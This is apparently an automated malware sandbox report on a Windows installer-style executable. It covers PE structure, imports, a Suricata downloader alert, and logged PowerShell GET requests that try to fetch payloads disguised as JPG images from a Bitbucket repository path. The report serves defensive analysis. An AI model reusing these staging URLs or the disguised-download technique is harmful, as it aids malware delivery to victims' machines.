                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000x2c.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x9a680x54.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x138.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x91480x520.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x7e400x8000d22d8a48c14d2185814d2ed24fb0aed1False0.546173095703125data6.092855112591348IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x90000x23400x30003748ff8966297360bdba725e2d585c23False0.318359375data3.84344715350442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0xc0000x1f000x1000f198899505f620007167379f74f8141cFalse0.083251953125data1.0384025678015962IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .pdata0xe0000x42c0x10002d9ecb32a70228f2b07b654e216a79eeFalse0.156005859375data1.4378876073270839IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xf0000x1ff560x20000e76a9f8a5e0d2e22f0fad0506d41e1d1False0.6657028198242188data6.626189673913868IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x2f0000x2c0x1000cf22972a59e8c2a2ad0453d649f2025dFalse0.017578125data0.10781936458684958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              AVI0xfac80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                                                                                                              RT_ICON0x128e40x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                                                                                                              RT_ICON0x12f4c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                                                                                                              RT_ICON0x132340x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                                                                                                              RT_ICON0x1341c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                                                                              RT_ICON0x135440xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                                                                                                              RT_ICON0x143ec0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                                                                                                              RT_ICON0x14c940x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                                                                                                              RT_ICON0x1535c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                                                                                                              RT_ICON0x158c40xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                                                                                                              RT_ICON0x232980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                                                                              RT_ICON0x258400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                                                                              RT_ICON0x268e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                                                                                                              RT_ICON0x272700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                                                                                                              RT_ICON0x276d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.32978723404255317
                                                                                                              RT_ICON0x27b400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.19394934333958724
                                                                                                              RT_ICON0x28be80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.1354771784232365
                                                                                                              RT_DIALOG0x2b1900x2f2dataEnglishUnited States0.4389920424403183
                                                                                                              RT_DIALOG0x2b4840x1b0dataEnglishUnited States0.5625
                                                                                                              RT_DIALOG0x2b6340x166dataEnglishUnited States0.5223463687150838
                                                                                                              RT_DIALOG0x2b79c0x1c0dataEnglishUnited States0.5446428571428571
                                                                                                              RT_DIALOG0x2b95c0x130dataEnglishUnited States0.5526315789473685
                                                                                                              RT_DIALOG0x2ba8c0x120dataEnglishUnited States0.5763888888888888
                                                                                                              RT_STRING0x2bbac0x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
                                                                                                              RT_STRING0x2bc380x520dataEnglishUnited States0.4032012195121951
                                                                                                              RT_STRING0x2c1580x5ccdataEnglishUnited States0.36455525606469
                                                                                                              RT_STRING0x2c7240x4b0dataEnglishUnited States0.385
                                                                                                              RT_STRING0x2cbd40x44adataEnglishUnited States0.3970856102003643
                                                                                                              RT_STRING0x2d0200x3cedataEnglishUnited States0.36858316221765913
                                                                                                              RT_RCDATA0x2d3f00x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                              RT_RCDATA0x2d3f80xe14Microsoft Cabinet archive data, Windows 2000/XP setup, 3604 bytes, 1 file, at 0x2c +A "124.bat", ID 508, number 1, 1 datablock, 0x1503 compressionEnglishUnited States1.0030521642619312
                                                                                                              RT_RCDATA0x2e20c0x4dataEnglishUnited States3.0
                                                                                                              RT_RCDATA0x2e2100x24dataEnglishUnited States0.7777777777777778
                                                                                                              RT_RCDATA0x2e2340x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                              RT_RCDATA0x2e23c0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                              RT_RCDATA0x2e2440x4dataEnglishUnited States3.0
                                                                                                              RT_RCDATA0x2e2480x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                              RT_RCDATA0x2e2500x4dataEnglishUnited States3.0
                                                                                                              RT_RCDATA0x2e2540xfASCII text, with no line terminatorsEnglishUnited States1.5333333333333334
                                                                                                              RT_RCDATA0x2e2640x4dataEnglishUnited States3.0
                                                                                                              RT_RCDATA0x2e2680x4dataEnglishUnited States3.0
                                                                                                              RT_RCDATA0x2e26c0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                              RT_RCDATA0x2e2740x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                              RT_GROUP_ICON0x2e27c0x30data0.9166666666666666
                                                                                                              RT_GROUP_ICON0x2e2ac0xbcdataEnglishUnited States0.6117021276595744
                                                                                                              RT_VERSION0x2e3680x408dataEnglishUnited States0.42248062015503873
                                                                                                              RT_MANIFEST0x2e7700x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                              KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                                                                                                              GDI32.dllGetDeviceCaps
                                                                                                              USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
                                                                                                              msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
                                                                                                              COMCTL32.dll
                                                                                                              Cabinet.dll
                                                                                                              VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-10-02T19:02:44.809157+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749700185.166.143.50443TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Oct 2, 2024 19:02:42.318567038 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:42.318598032 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:42.319402933 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:42.326513052 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:42.326528072 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:42.995073080 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:42.995176077 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:42.999654055 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:42.999665976 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:42.999933004 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:43.012264013 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:43.059411049 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:43.512857914 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:43.512923956 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:43.512943029 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:43.512960911 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:43.512981892 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:43.512988091 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:43.513001919 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:43.513016939 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:43.513045073 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:43.513071060 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:43.597841024 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:43.597934008 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:43.597949982 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:43.598064899 CEST44349699185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:43.598115921 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:43.609416008 CEST49699443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:43.663186073 CEST49700443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:43.663244009 CEST44349700185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:43.663320065 CEST49700443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:43.663889885 CEST49700443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:43.663911104 CEST44349700185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:44.299258947 CEST44349700185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:44.301146030 CEST49700443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:44.301182985 CEST44349700185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:44.808984995 CEST44349700185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:44.809009075 CEST44349700185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:44.809029102 CEST44349700185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:44.809070110 CEST49700443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:44.809092045 CEST44349700185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:44.809106112 CEST49700443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:44.809138060 CEST49700443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:44.893155098 CEST44349700185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:44.893218040 CEST49700443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:44.893244028 CEST44349700185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:44.893260956 CEST44349700185.166.143.50192.168.2.7
                                                                                                              Oct 2, 2024 19:02:44.893304110 CEST49700443192.168.2.7185.166.143.50
                                                                                                              Oct 2, 2024 19:02:44.893510103 CEST49700443192.168.2.7185.166.143.50

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Oct 2, 2024 19:02:42.302431107 CEST5764553192.168.2.71.1.1.1
                                                                                                              Oct 2, 2024 19:02:42.312102079 CEST53576451.1.1.1192.168.2.7
                                                                                                              Oct 2, 2024 19:02:59.322211981 CEST53585491.1.1.1192.168.2.7

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Oct 2, 2024 19:02:42.302431107 CEST192.168.2.71.1.1.10x1716Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Oct 2, 2024 19:02:42.312102079 CEST1.1.1.1192.168.2.70x1716No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                              Oct 2, 2024 19:02:42.312102079 CEST1.1.1.1192.168.2.70x1716No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                              Oct 2, 2024 19:02:42.312102079 CEST1.1.1.1192.168.2.70x1716No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • bitbucket.org

                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.749699185.166.143.504432412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-02 17:02:43 UTC110OUTGET /hgdfhdfgd/test/downloads/new_image.jpg?14441723 HTTP/1.1
                                                                                                              Host: bitbucket.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-10-02 17:02:43 UTC3988INHTTP/1.1 404 Not Found
                                                                                                              Date: Wed, 02 Oct 2024 17:02:43 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Content-Length: 15020
                                                                                                              Server: AtlassianEdge
                                                                                                              Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
                                                                                                              X-Used-Mesh: False
                                                                                                              Content-Language: en
                                                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                              Etag: "b693a90a4b9b7ba5606827020189b49f"
                                                                                                              X-Dc-Location: Micros-3
                                                                                                              X-Served-By: 3c4d22791762
                                                                                                              X-Version: 3ff600212c86
                                                                                                              X-Static-Version: 3ff600212c86
                                                                                                              X-Request-Count: 394
                                                                                                              X-Render-Time: 0.08880853652954102
                                                                                                              X-B3-Traceid: 7002740a6d0144de9b07c02da296923c
                                                                                                              X-B3-Spanid: ab147ab00f9b85bb
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend. [TRUNCATED]
                                                                                                              X-Usage-Quota-Remaining: 998487.578
                                                                                                              X-Usage-Request-Cost: 1537.47
                                                                                                              X-Usage-User-Time: 0.041805
                                                                                                              X-Usage-System-Time: 0.004319
                                                                                                              X-Usage-Input-Ops: 0
                                                                                                              X-Usage-Output-Ops: 0
                                                                                                              Cache-Control: max-age=900
                                                                                                              Age: 0
                                                                                                              X-Cache: MISS
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                              Atl-Traceid: 7002740a6d0144de9b07c02da296923c
                                                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                              Server-Timing: atl-edge;dur=200,atl-edge-internal;dur=2,atl-edge-upstream;dur=198,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                              Connection: close
                                                                                                              2024-10-02 17:02:43 UTC12396INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 69 64 3d 22 62 62 2d 62 6f 6f 74 73 74 72 61 70 22 20 64 61 74 61 2d 63 75 72 72 65 6e 74 2d 75 73 65 72 3d 22 7b 26 71 75 6f 74 3b 69 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 2c 20 26 71 75 6f 74 3b 69 73 4b 62 64 53 68 6f 72 74 63 75 74 73 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 74 72 75 65 2c 20 26 71 75 6f 74 3b 69 73 53 73 68 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 7d 22 0a 0a 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 55 68 44 49 49 4d 47 74 38 46 77 39 4d 64 59 5a 59 48 44 6d 6c 67 3d 3d 22 3e 0a 0a 69 66 20 28 77 69 6e 64
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta id="bb-bootstrap" data-current-user="{&quot;isAuthenticated&quot;: false, &quot;isKbdShortcutsEnabled&quot;: true, &quot;isSshEnabled&quot;: false}" /> <script nonce="UhDIIMGt8Fw9MdYZYHDmlg==">if (wind
                                                                                                              2024-10-02 17:02:43 UTC2624INData Raw: 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 69 70 65 6c 69 6e 65 73 2d 64 65 70 6c 6f 79 6d 65 6e 74 73 2d 73 65 74 74 69 6e 67 73 2d 75 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 69 70 65 6c 69 6e 65 73 2d 72 75 6e 6e 65 72 73 2d 73 65 74 74 69 6e 67 73 2d 75 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 72 2d 64 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 20 66 61 6c 73 65 2c 20 22 63 6f 6d 6d 69 74 2d 65 78 70 61 6e 64 2d 69 6e 6e 6f 22 3a 20 66 61 6c 73 65 2c 20 22 73 79 6e 74 61 78 2d 68 69 67 68 6c 69 67 68 74 69 6e 67 22 3a 20 66 61 6c 73 65 2c 20 22 63 72 65 61 74 65 2d 77 6f 72 6b 73 70 61 63 65 2d 73 68 6f 77 2d 72 65 63 61 70 74 63 68 61 22
                                                                                                              Data Ascii: i-in-frontbucket": true, "pipelines-deployments-settings-ui-in-frontbucket": true, "pipelines-runners-settings-ui-in-frontbucket": true, "pr-dependencies": false, "commit-expand-inno": false, "syntax-highlighting": false, "create-workspace-show-recaptcha"


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.749700185.166.143.504432412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-02 17:02:44 UTC87OUTGET /hgdfhdfgd/test/downloads/new_image2.jpg?14461721 HTTP/1.1
                                                                                                              Host: bitbucket.org
                                                                                                              2024-10-02 17:02:44 UTC3988INHTTP/1.1 404 Not Found
                                                                                                              Date: Wed, 02 Oct 2024 17:02:44 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Content-Length: 15023
                                                                                                              Server: AtlassianEdge
                                                                                                              Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
                                                                                                              X-Used-Mesh: False
                                                                                                              Content-Language: en
                                                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                              Etag: "dcf3f17fb20258bb578342014cdbd4f0"
                                                                                                              X-Dc-Location: Micros-3
                                                                                                              X-Served-By: b49e06def07e
                                                                                                              X-Version: 3ff600212c86
                                                                                                              X-Static-Version: 3ff600212c86
                                                                                                              X-Request-Count: 154
                                                                                                              X-Render-Time: 0.08371186256408691
                                                                                                              X-B3-Traceid: 6e135e3382124723921a6252805b581a
                                                                                                              X-B3-Spanid: b2a3d0ff1cd02587
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend. [TRUNCATED]
                                                                                                              X-Usage-Quota-Remaining: 997292.410
                                                                                                              X-Usage-Request-Cost: 1556.20
                                                                                                              X-Usage-User-Time: 0.040645
                                                                                                              X-Usage-System-Time: 0.006041
                                                                                                              X-Usage-Input-Ops: 0
                                                                                                              X-Usage-Output-Ops: 0
                                                                                                              Cache-Control: max-age=900
                                                                                                              Age: 0
                                                                                                              X-Cache: MISS
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                              Atl-Traceid: 6e135e3382124723921a6252805b581a
                                                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                              Server-Timing: atl-edge;dur=192,atl-edge-internal;dur=4,atl-edge-upstream;dur=190,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                              Connection: close
                                                                                                              2024-10-02 17:02:44 UTC12396INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 69 64 3d 22 62 62 2d 62 6f 6f 74 73 74 72 61 70 22 20 64 61 74 61 2d 63 75 72 72 65 6e 74 2d 75 73 65 72 3d 22 7b 26 71 75 6f 74 3b 69 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 2c 20 26 71 75 6f 74 3b 69 73 4b 62 64 53 68 6f 72 74 63 75 74 73 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 74 72 75 65 2c 20 26 71 75 6f 74 3b 69 73 53 73 68 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 7d 22 0a 0a 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 5a 4f 4d 4f 4b 59 69 4d 33 76 34 2f 4d 43 77 74 52 53 65 63 32 77 3d 3d 22 3e 0a 0a 69 66 20 28 77 69 6e 64
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta id="bb-bootstrap" data-current-user="{&quot;isAuthenticated&quot;: false, &quot;isKbdShortcutsEnabled&quot;: true, &quot;isSshEnabled&quot;: false}" /> <script nonce="ZOMOKYiM3v4/MCwtRSec2w==">if (wind
